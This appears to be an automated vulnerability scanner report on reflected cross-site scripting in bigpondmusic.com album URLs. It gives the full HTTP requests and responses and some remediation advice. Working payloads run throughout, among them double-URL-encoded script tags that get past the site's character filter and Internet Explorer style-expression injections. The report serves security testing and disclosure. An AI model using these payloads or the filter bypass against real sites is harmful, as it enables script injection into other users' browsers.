GET /album/far-east-movement/like-a-g6?878a2"style%3d"x%3aexpression(alert(1))"ab522009b4e=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:22:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 97573
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Far East Movement - Like a G ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/far-east-movement/like-a-g6?878a2"style="x:expression(alert(1))"ab522009b4e=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc86a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1869074cf3 was submitted in the REST URL parameter 1. This input was echoed as dc86a"><script>alert(1)</script>1869074cf3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /albumdc86a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1869074cf3/glee-cast/glee-the-music-the-christmas-album HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:18:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88503
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41244'%3baf912ffdfba was submitted in the REST URL parameter 1. This input was echoed as 41244';af912ffdfba in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /album41244'%3baf912ffdfba/glee-cast/glee-the-music-the-christmas-album HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:18:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88067
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61097"style%3d"x%3aexpression(alert(1))"481039f11e9 was submitted in the h parameter. This input was echoed as 61097"style="x:expression(alert(1))"481039f11e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/glee-cast/glee-the-music-the-christmas-album?h=76603962461097"style%3d"x%3aexpression(alert(1))"481039f11e9 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:18:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 123124
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b176"style%3d"x%3aexpression(alert(1))"314c9adb4aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9b176"style="x:expression(alert(1))"314c9adb4aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/glee-cast/glee-the-music-the-christmas-album?9b176"style%3d"x%3aexpression(alert(1))"314c9adb4aa=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:18:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 123079
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4974%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f5d7856cbe was submitted in the REST URL parameter 1. This input was echoed as e4974"><script>alert(1)</script>0f5d7856cbe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /albume4974%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f5d7856cbe/glee-cast/glee-the-music-the-christmas-album/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:18:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88180
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bd58'%3bb759352d2a7 was submitted in the REST URL parameter 1. This input was echoed as 1bd58';b759352d2a7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /album1bd58'%3bb759352d2a7/glee-cast/glee-the-music-the-christmas-album/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:18:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88285
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a07ef"style%3d"x%3aexpression(alert(1))"21c6a478415 was submitted in the cid parameter. This input was echoed as a07ef"style="x:expression(alert(1))"21c6a478415 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/glee-cast/glee-the-music-the-christmas-album/?cid=gleexmasa07ef"style%3d"x%3aexpression(alert(1))"21c6a478415 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:18:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 123535
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb638"style%3d"x%3aexpression(alert(1))"8fd9221ba73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb638"style="x:expression(alert(1))"8fd9221ba73 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/glee-cast/glee-the-music-the-christmas-album/?eb638"style%3d"x%3aexpression(alert(1))"8fd9221ba73=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:18:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 123075
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1bf9'%3b287a2412129 was submitted in the REST URL parameter 1. This input was echoed as c1bf9';287a2412129 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /albumc1bf9'%3b287a2412129/grinderman/worm-tamer HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:26:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88515
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95602%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd7e35b9c6e was submitted in the REST URL parameter 1. This input was echoed as 95602"><script>alert(1)</script>bd7e35b9c6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album95602%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd7e35b9c6e/grinderman/worm-tamer HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:26:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88217
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2673"style%3d"x%3aexpression(alert(1))"545b5603757 was submitted in the h parameter. This input was echoed as d2673"style="x:expression(alert(1))"545b5603757 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/grinderman/worm-tamer?h=764552781d2673"style%3d"x%3aexpression(alert(1))"545b5603757 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:26:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 106667
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.61. http://bigpondmusic.com/album/grinderman/worm-tamer [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/grinderman/worm-tamer
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f27a"style%3d"x%3aexpression(alert(1))"0807d081f23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f27a"style="x:expression(alert(1))"0807d081f23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/grinderman/worm-tamer?6f27a"style%3d"x%3aexpression(alert(1))"0807d081f23=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:26:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 106658
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba08d'%3b1e196c98b41 was submitted in the REST URL parameter 1. This input was echoed as ba08d';1e196c98b41 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /albumba08d'%3b1e196c98b41/guy-sebastian/twenty-ten/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:19:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88225
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3ae8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e70c377bcd85 was submitted in the REST URL parameter 1. This input was echoed as e3ae8"><script>alert(1)</script>70c377bcd85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /albume3ae8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e70c377bcd85/guy-sebastian/twenty-ten/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:19:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88448
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
